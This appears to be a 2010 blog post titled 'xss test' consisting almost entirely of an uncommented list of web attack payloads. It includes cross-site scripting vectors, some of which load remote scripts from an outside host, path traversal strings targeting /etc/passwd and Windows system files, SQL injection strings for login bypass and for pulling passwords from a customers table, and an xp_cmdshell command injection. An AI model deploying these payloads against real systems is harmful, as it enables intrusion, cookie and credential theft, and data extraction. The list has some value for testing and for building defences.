10
11
2010
xss test
bigCat Posted in NoteBook - Comment.isNotBlank\'><script>alert(document.cookie)</script>
=\'><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(\'XSS\')%3C/script%3E
<script>alert(\'XSS\')</script>
<img src=\"javascript:alert(\'XSS\')\">
%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert(\'Vulnerable\');</script>
<script>alert(\'Vulnerable\')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert(\'Vulnerable\')</script>
a/
a?<script>alert(\'Vulnerable\')</script>
\"><script>alert(\'Vulnerable\')</script>
\';exec%20master..xp_cmdshell%20\'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt\'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
\'\';!--\"<XSS>=&{()}
<IMG SRC=\"javascript:alert(\'XSS\');\">
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=JaVaScRiPt:alert(\'XSS\')>
<IMG SRC=JaVaScRiPt:alert(\"XSS\")>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";\' > out
<IMG SRC=\" javascript:alert(\'XSS\');\">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=\"javascript:alert(\'XSS\')\">
<BODY ONLOAD=alert(\'XSS\')>
<IMG DYNSRC=\"javascript:alert(\'XSS\')\">
<IMG LOWSRC=\"javascript:alert(\'XSS\')\">
<BGSOUND SRC=\"javascript:alert(\'XSS\');\">
<br size=\"&{alert(\'XSS\')}\">
<LAYER SRC=\"http://xss.ha.ckers.org/a.js\"></layer>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert(\'XSS\');\">
<IMG SRC=\'vbscript:msgbox(\"XSS\")\'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(\'XSS\');\">
<IFRAME SRC=javascript:alert(\'XSS\')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert(\'XSS\')></FRAME></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert(\'XSS\')\">
<DIV STYLE=\"background-image: url(javascript:alert(\'XSS\'))\">
<DIV STYLE=\"behaviour: url(\'http://www.how-to-hack.org/exploit.html\');\">
<DIV STYLE=\"width: expression(alert(\'XSS\'));\">
<STYLE>@im\\port\'\\ja\\vasc\\ript:alert(\"XSS\")\';</STYLE>
<IMG STYLE=\'xss:expre\\ssion(alert(\"XSS\"))\'>
<STYLE TYPE=\"text/javascript\">alert(\'XSS\');</STYLE>
<STYLE TYPE=\"text/css\">.XSS{background-image:url(\"javascript:alert(\'XSS\')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(\'XSS\')\")}</STYLE>
<BASE HREF=\"javascript:alert(\'XSS\');//\">
getURL(\"javascript:alert(\'XSS\')\")
a=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert(\'XSS\');\";eval(a+b+c+d);
<XML SRC=\"javascript:alert(\'XSS\');\">
\"> <BODY ONLOAD=\"a();\"><SCRIPT>function a(){alert(\'XSS\');}</SCRIPT><\"
<SCRIPT SRC=\"http://xss.ha.ckers.org/xss.jpg\"></SCRIPT>
<IMG SRC=\"javascript:alert(\'XSS\')\"
<!--#exec cmd=\"/bin/echo \'<SCRIPT SRC\'\"--><!--#exec cmd=\"/bin/echo \'=http://xss.ha.ckers.org/a.js></SCRIPT>\'\"-->
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
<SCRIPT a=\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT a=\">\" \'\' SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT \"a=\'>\'\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin\'--
\' or 0=0 --
\" or 0=0 --
or 0=0 --
\' or 0=0 #
\" or 0=0 #
or 0=0 #
\' or \'x\'=\'x
\" or \"x\"=\"x
\') or (\'x\'=\'x
\' or 1=1--
\" or 1=1--
or 1=1--
\' or a=a--
\" or \"a\"=\"a
\') or (\'a\'=\'a
\") or (\"a\"=\"a
hi\" or \"a\"=\"a
hi\" or 1=1 --
hi\' or 1=1 --
hi\' or \'a\'=\'a
hi\') or (\'a\'=\'a
hi\") or (\"a\"=\"a
这是神马?